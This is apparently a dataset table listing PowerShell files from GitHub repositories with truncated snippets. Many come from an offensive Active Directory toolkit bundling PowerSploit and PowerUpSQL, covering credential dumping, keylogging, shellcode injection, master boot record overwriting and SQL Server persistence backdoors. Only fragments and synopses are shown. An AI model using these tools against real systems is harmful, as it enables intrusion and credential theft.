source
stringclasses
1 value
repo
stringclasses
33 values
repo_url
stringclasses
33 values
path
stringlengths
7
179
language
stringclasses
1 value
license
stringclasses
4 values
stars
int64
2.27k
53.4k
ref
stringclasses
4 values
size_bytes
int64
48
259k
text
stringlengths
48
259k
github
dataplat/dbatools
https://github.com/dataplat/dbatools
.claude/hooks/validate-style.ps1
PowerShell
mit
2,763
development
5,792
#!/usr/bin/env pwsh # PreToolUse hook: Consolidated style validation for dbatools # Runs all style checks in a single PowerShell process for performance $ErrorActionPreference = "Stop" try { $inputJson = $input | Out-String | ConvertFrom-Json } catch { exit 0 } $toolInput = $inputJson.tool_input $filePath = ...
github
omerbsezer/Fast-Kubernetes
https://github.com/omerbsezer/Fast-Kubernetes
create_real_cluster/win2019-kubeadm1.26.2-calico3.25.0-docker/install1.ps1
PowerShell
mit
2,734
main
2,037
echo "#########################################################" echo "Script will start in 10 Seconds..." Start-Sleep -s 10 echo "Firewall rules : Allow All Traffic..." New-NetFireWallRule -DisplayName "Allow All Traffic" -Direction OutBound -Action Allow New-NetFireWallRule -DisplayName "Allow All Traffic" -Direct...
github
omerbsezer/Fast-Kubernetes
https://github.com/omerbsezer/Fast-Kubernetes
create_real_cluster/win2019-kubeadm1.26.2-calico3.25.0-docker/install-docker-ce.ps1
PowerShell
mit
2,734
main
21,248
# Microsoft: https://github.com/microsoft/Windows-Containers/blob/Main/helpful_tools/Install-DockerCE/install-docker-ce.ps1 ############################################################ # Script to install the community edition of docker on Windows ############################################################ <# .NO...
github
omerbsezer/Fast-Kubernetes
https://github.com/omerbsezer/Fast-Kubernetes
create_real_cluster/win2019-kubeadm1.26.2-calico3.25.0-docker/install2.ps1
PowerShell
mit
2,734
main
1,496
echo "#########################################################" echo "Before to run this script, please be sure creating 'k' directory under C directory (c:\k) and includes K8s config file..." echo "e.g. mkdir c:\k" echo "e.g. run on the master node: scp -r /home/ubuntu/.kube/config windowsuser@IP:C:\k" echo "#######...
github
omerbsezer/Fast-Kubernetes
https://github.com/omerbsezer/Fast-Kubernetes
create_real_cluster/win2022-kubeadm1.32.0-calico3.29.1-containerd1.7.24/install2.ps1
PowerShell
mit
2,734
main
2,061
echo "#########################################################" echo "Before to run this script, please be sure creating 'k' directory under C directory (c:\k) and includes K8s config file..." echo "e.g. mkdir c:\k" echo "e.g. run on the master node: scp -r /home/ubuntu/.kube/config windowsuser@IP:C:\k" echo "#######...
github
omerbsezer/Fast-Kubernetes
https://github.com/omerbsezer/Fast-Kubernetes
create_real_cluster/win2022-kubeadm1.32.0-calico3.29.1-containerd1.7.24/install1.ps1
PowerShell
mit
2,734
main
1,951
echo "#########################################################" echo "Script will start in 10 Seconds..." Start-Sleep -s 10 echo "Firewall rules : Allow All Traffic..." New-NetFireWallRule -DisplayName "Allow All Traffic" -Direction OutBound -Action Allow New-NetFireWallRule -DisplayName "Allow All Traffic" -Direct...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/PowerSploit.psd1
PowerShell
mit
2,733
master
5,275
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'PowerSploit.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '6753b496-d842-40a3-924a-0f09e248640c' # Author of this module Author = 'Matthew Graeber' # Copyri...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Persistence/Persistence.psd1
PowerShell
mit
2,733
master
763
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'Persistence.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '633d0f10-a056-41da-869d-6d2f75430195' # Author of this module Author = 'Matthew Graeber' # Copyr...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Persistence/Persistence.psm1
PowerShell
mit
2,733
master
38,266
function New-ElevatedPersistenceOption { <# .SYNOPSIS Configure elevated persistence options for the Add-Persistence function. PowerSploit Function: New-ElevatedPersistenceOption Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Exfiltration/Get-GPPAutologon.ps1
PowerShell
mit
2,733
master
4,710
function Get-GPPAutologon { <# .SYNOPSIS Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences. PowerSploit Function: Get-GPPAutologon Author: Oddvar Moe (@oddvarmoe) Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Exfiltration/Get-TimedScreenshot.ps1
PowerShell
mit
2,733
master
3,696
function Get-TimedScreenshot { <# .SYNOPSIS Takes screenshots at a regular interval and saves them to disk. PowerSploit Function: Get-TimedScreenshot Author: Chris Campbell (@obscuresec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION A function that takes screenshots ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Exfiltration/Get-GPPPassword.ps1
PowerShell
mit
2,733
master
11,360
function Get-GPPPassword { <# .SYNOPSIS Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. PowerSploit Function: Get-GPPPassword Author: Chris Campbell (@obscuresec) License: BSD 3-Clause Required Dependencies: None Optional Dependencie...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Exfiltration/Get-MicrophoneAudio.ps1
PowerShell
mit
2,733
master
7,366
function Get-MicrophoneAudio { <# .SYNOPSIS Records audio from the microphone and saves to a file on disk Author: Justin Warner (@sixdub) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None All credit for PowerSploit functions belongs to the original author and project contributors. Thanks fo...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Exfiltration/Out-Minidump.ps1
PowerShell
mit
2,733
master
3,616
function Out-Minidump { <# .SYNOPSIS Generates a full-memory minidump of a process. PowerSploit Function: Out-Minidump Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-Minidump writes a process dump f...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Exfiltration/Exfiltration.psd1
PowerShell
mit
2,733
master
1,304
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'Exfiltration.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a' # Author of this module Author = 'Matthew Graeber' # Copy...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Exfiltration/Get-VaultCredential.ps1
PowerShell
mit
2,733
master
20,432
function Get-VaultCredential { <# .SYNOPSIS Displays Windows vault credential objects including cleartext web credentials. PowerSploit Function: Get-VaultCredential Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Get-VaultCredenti...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Exfiltration/Invoke-TokenManipulation.ps1
PowerShell
mit
2,733
master
94,704
function Invoke-TokenManipulation { <# .SYNOPSIS This script requires Administrator privileges. It can enumerate the Logon Tokens available and use them to create new processes. This allows you to use anothers users credentials over the network by creating a process with their logon token. This will work even with Win...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Exfiltration/VolumeShadowCopyTools.ps1
PowerShell
mit
2,733
master
9,559
function Get-VolumeShadowCopy { <# .SYNOPSIS Lists the device paths of all local volume shadow copies. PowerSploit Function: Get-VolumeShadowCopy Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None #> $UserIdentity = ([Se...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Exfiltration/Get-Keystrokes.ps1
PowerShell
mit
2,733
master
16,512
function Get-Keystrokes { <# .SYNOPSIS Logs keys pressed, time and the active window. PowerSploit Function: Get-Keystrokes Original Authors: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation) Revised By: Jesse Davis (@secabstraction) License: BSD 3-Clause Required Dependenc...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Mayhem/Mayhem.psm1
PowerShell
mit
2,733
master
12,935
function Set-MasterBootRecord { <# .SYNOPSIS Proof of concept code that overwrites the master boot record with the message of your choice. PowerSploit Function: Set-MasterBootRecord Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec) License: BSD 3-Clause Required Depend...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Mayhem/Mayhem.psd1
PowerShell
mit
2,733
master
743
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'Mayhem.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c' # Author of this module Author = 'Matthew Graeber' # Copyright ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Tests/CodeExecution.tests.ps1
PowerShell
mit
2,733
master
52,571
Set-StrictMode -Version Latest $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent $ModuleRoot = Resolve-Path "$TestScriptRoot\.." $ModuleManifest = "$ModuleRoot\CodeExecution\CodeExecution.psd1" Remove-Module [C]odeExecution Import-Module $ModuleManifest -Force -ErrorAction Stop Describe 'Invoke-Shell...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Tests/Recon.tests.ps1
PowerShell
mit
2,733
master
21,725
$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent $ModuleRoot = Resolve-Path "$TestScriptRoot\.." $ModuleManifest = "$ModuleRoot\Recon\Recon.psd1" Remove-Module [R]econ Import-Module $ModuleManifest -Force -ErrorAction Stop # import PowerView.ps1 manually so we expose the helper functions for testing ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Tests/Privesc.tests.ps1
PowerShell
mit
2,733
master
50,613
Set-StrictMode -Version Latest $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent $ModuleRoot = Resolve-Path "$TestScriptRoot\.." $ModuleManifest = "$ModuleRoot\Privesc\Privesc.psd1" Remove-Module [P]rivesc Import-Module $ModuleManifest -Force -ErrorAction Stop # import PowerUp.ps1 manually so we expo...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Tests/Exfiltration.tests.ps1
PowerShell
mit
2,733
master
2,450
Set-StrictMode -Version Latest $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent $ModuleRoot = Resolve-Path "$TestScriptRoot\.." $ModuleManifest = "$ModuleRoot\Exfiltration\Exfiltration.psd1" Remove-Module [E]xfiltration Import-Module $ModuleManifest -Force -ErrorAction Stop Describe 'Get-Keystrokes'...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Tests/PowerSploit.tests.ps1
PowerShell
mit
2,733
master
1,448
Set-StrictMode -Version Latest $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent $ModuleRoot = Resolve-Path "$TestScriptRoot\.." filter Assert-NotLittleEndianUnicode { [CmdletBinding()] param ( [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True, ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Recon/Invoke-ReverseDnsLookup.ps1
PowerShell
mit
2,733
master
8,101
function Invoke-ReverseDnsLookup { <# .SYNOPSIS Perform a reverse DNS lookup scan on a range of IP addresses. PowerSploit Function: Invoke-ReverseDnsLookup Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Invoke-ReverseDnsLookup sc...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Recon/Recon.psd1
PowerShell
mit
2,733
master
2,888
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'Recon.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '7e775ad6-cd3d-4a93-b788-da067274c877' # Author of this module Author = 'Matthew Graeber', 'Will Schroed...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Recon/Invoke-Portscan.ps1
PowerShell
mit
2,733
master
41,534
function Invoke-Portscan { <# .SYNOPSIS Simple portscan module PowerSploit Function: Invoke-Portscan Author: Rich Lundeen (http://webstersProdigy.net) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Does a simple port scan using regular sockets, based (pretty) loosely on n...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Recon/Get-ComputerDetails.ps1
PowerShell
mit
2,733
master
17,631
function Get-ComputerDetails { <# .SYNOPSIS This script is used to get useful information from a computer. Function: Get-ComputerDetails Author: Joe Bialek, Twitter: @JosephBialek Required Dependencies: None Optional Dependencies: None .DESCRIPTION This script is used to get useful information from a computer. Curr...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Recon/Get-HttpStatus.ps1
PowerShell
mit
2,733
master
3,679
function Get-HttpStatus { <# .SYNOPSIS Returns the HTTP Status Codes and full URL for specified paths. PowerSploit Function: Get-HttpStatus Author: Chris Campbell (@obscuresec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION A script to check for the existence of a path or...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/AntivirusBypass/Find-AVSignature.ps1
PowerShell
mit
2,733
master
6,583
function Find-AVSignature { <# .SYNOPSIS Locate tiny AV signatures. PowerSploit Function: Find-AVSignature Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Locates single Byte AV signatures utilizing the...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/AntivirusBypass/AntivirusBypass.psd1
PowerShell
mit
2,733
master
844
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'AntivirusBypass.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b' # Author of this module Author = 'Matthew Graeber' # C...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/ScriptModification/Remove-Comments.ps1
PowerShell
mit
2,733
master
5,061
function Remove-Comments { <# .SYNOPSIS Strips comments and extra whitespace from a script. PowerSploit Function: Remove-Comments Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Remove-Comments strips out comments and unnecessary ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/ScriptModification/Out-EncryptedScript.ps1
PowerShell
mit
2,733
master
4,850
function Out-EncryptedScript { <# .SYNOPSIS Encrypts text files/scripts. PowerSploit Function: Out-EncryptedScript Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncryptedScript will encrypt a script (or any text file for that...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/ScriptModification/Out-CompressedDll.ps1
PowerShell
mit
2,733
master
2,386
function Out-CompressedDll { <# .SYNOPSIS Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. PowerSploit Function: Out-CompressedDll Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-Compres...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/ScriptModification/Out-EncodedCommand.ps1
PowerShell
mit
2,733
master
7,792
function Out-EncodedCommand { <# .SYNOPSIS Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. PowerSploit Function: Out-EncodedCommand Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Ou...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/ScriptModification/ScriptModification.psd1
PowerShell
mit
2,733
master
952
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'ScriptModification.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610' # Author of this module Author = 'Matthew Graeber' ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Privesc/Get-System.ps1
PowerShell
mit
2,733
master
26,485
function Get-System { <# .SYNOPSIS GetSystem functionality inspired by Meterpreter's getsystem. 'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege. NOTE: if running PowerShell 2.0, start p...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/Privesc/Privesc.psd1
PowerShell
mit
2,733
master
1,564
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'Privesc.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56' # Author of this module Author = 'Will Schroeder' # Copyright ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/CodeExecution/Invoke-DllInjection.ps1
PowerShell
mit
2,733
master
12,721
function Invoke-DllInjection { <# .SYNOPSIS Injects a Dll into the process ID of your choosing. PowerSploit Function: Invoke-DllInjection Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Invoke-DllInjection injects a Dll into an arb...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/CodeExecution/Invoke-Shellcode.ps1
PowerShell
mit
2,733
master
23,817
function Invoke-Shellcode { <# .SYNOPSIS Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. PowerSploit Function: Invoke-Shellcode Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESC...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/CodeExecution/Invoke-ReflectivePEInjection.ps1
PowerShell
mit
2,733
master
135,782
function Invoke-ReflectivePEInjection { <# .SYNOPSIS This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for informati...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/CodeExecution/CodeExecution.psd1
PowerShell
mit
2,733
master
952
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'CodeExecution.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c' # Author of this module Author = 'Matthew Graeber' # Com...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Master/CodeExecution/Invoke-WmiCommand.ps1
PowerShell
mit
2,733
master
14,479
function Invoke-WmiCommand { <# .SYNOPSIS Executes a PowerShell ScriptBlock on a target computer using WMI as a pure C2 channel. Author: Matthew Graeber License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Invoke-WmiCommand executes a PowerShell ScriptBlock on a target computer...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/JAWS/jaws-enum.ps1
PowerShell
mit
2,733
master
16,974
<# .SYNOPSIS Windows enumeration script .DESCRIPTION This script is designed to be used in a penetration test or CTF enviroment. It will enumerate useful information from the host for privilege escalation. .EXAMPLE PS > .\jaws-enum.ps1 will write results out to screen. .EXAMPLE PS > .\jaws-enum.ps1 -OutputFileName Jaw...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Invoke-CradleCrafter/Invoke-CradleCrafter.psd1
PowerShell
mit
2,733
master
1,884
# This file is part of Invoke-CradleCrafter. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a cop...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Set-PS-WMI/Set-RemotePSRemoting.ps1
PowerShell
mit
2,733
master
5,719
function Set-RemotePSRemoting { <# .SYNOPSIS Nishang script which can be used to modify Security Descriptors of PowerShell Remoting to provide access for non-admin domain users. .DESCRIPTION The script takes a username and adds FUll Control (Generic All) to the ACL of PowerShell Remoting The script needs elevat...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Set-PS-WMI/Set-RemoteWMI.ps1
PowerShell
mit
2,733
master
8,203
function Set-RemoteWMI { <# .SYNOPSIS Nishang script which can be used to modify Security Descriptors of DCOM and WMI namespaces to provide non-admin domain users access to WMI. .DESCRIPTION The script takes a username and adds permissions equivalent to Built-in Administratorsto the ACL of DCOM and WMI namespac...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/PowerUpSQL.psm1
PowerShell
mit
2,733
master
111
Get-ChildItem (Join-Path -Path $PSScriptRoot -ChildPath *.ps1) | ForEach-Object -Process { . $_.FullName }
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/PowerUpSQL.psd1
PowerShell
mit
2,733
master
4,773
#requires -Version 1 @{ ModuleToProcess = 'PowerUpSQL.psm1' ModuleVersion = '1.104.13' GUID = 'dd1fe106-2226-4869-9363-44469e930a4a' Author = 'Scott Sutherland' Copyright = 'BSD 3-Clause' Description = 'PowerUpSQL is an offensive toolkit designed for a...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/tests/PowerUpSQLTests.ps1
PowerShell
mit
2,733
master
60,191
# PowerUpSQL Pester Tests # Tested on SQL Server 2014 # This should used against a local SQL Server instance that meets the following criteria: # - SQL Server 2014 # - Mixed mode # - The windows user running the script has sysadmin # - The pesterdb.sql configuration script was run on the SQL Server by a sysadmin #####...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/templates/CheatSheet_SMO_Commands.ps1
PowerShell
mit
2,733
master
3,191
# Script Name: # SQL Server SMO Cheatsheet (0.CheatSheet-SqlServerSmo.ps1) # Author: # Scott Sutherland (@_nullbind), 2015 NetSPI # Description: # This file contains basic examples that show how to query SQL Server # for configuration information using the SQL Server SDK SMO APIs. # Requirements: # The ex...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/scripts/pending/Get-SQLServiceAccountPwHashes.ps1
PowerShell
mit
2,733
master
3,964
# author: scott sutherland (@_nullbind), NetSPI 2016 # script name: Get-SQLServiceAccountPwHash.ps1 # requirements: PowerUpSQL and Inveigh # description: locate domain sql servers, attempt login, unc path inject to capture password hash of associated service account. # example: Get-SQLServiceAccountPwHashes -Verbose -C...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/scripts/pending/Get-SQLCompactQuery.ps1
PowerShell
mit
2,733
master
1,957
# Script: Get-SQLCompactQuery # Pseudo Author: Scott Sutherland (@_nullbind), NetSPI 2016 # This script is a slightly modified version of Jeremiah Clark's example code from the reference below. # Reference: https://blogs.msdn.microsoft.com/miah/2011/08/08/powershell-and-sql-server-compact-4-0-a-happy-mix/ # Reference: ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/scripts/pending/Invoke-SqlServer-Persist-TriggerLogon.psm1
PowerShell
mit
2,733
master
17,597
function Invoke-SqlServer-Persist-TriggerLogon { <# .SYNOPSIS This script can be used backdoor a Windows system using SQL Serverlogon triggers. .DESCRIPTION This script can be used backdoor a Windows system using a SQL Server logon triggers. As a result, the associated TSQL will execute when any the attack at...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/scripts/pending/Invoke-SQLOSCmdCLRWMIProvider.ps1
PowerShell
mit
2,733
master
29,987
# todo <# Note: dependant on PowerUpSQL. - have script accept command or source script as string --- have that get bake into the wmi provider method --- update the wmi method to execute the provided string as a script block --- mod the clr to return the output of the wmi command - roll into clone of the inv...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/scripts/pending/Get-MSSQLCredentialPasswords.psm1
PowerShell
mit
2,733
master
5,843
function Get-MSSQLCredentialPasswords{ <# .SYNOPSIS Extract and decrypt MSSQL Credentials passwords. Author: Antti Rantasaari 2014, NetSPI License: BSD 3-Clause .DESCRIPTION Get-MSSQLCredentialPasswords extracts and decrypts the connection credentials for all saved Credentials. .INPUTS...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerUpSQL/scripts/pending/SQLC2.ps1
PowerShell
mit
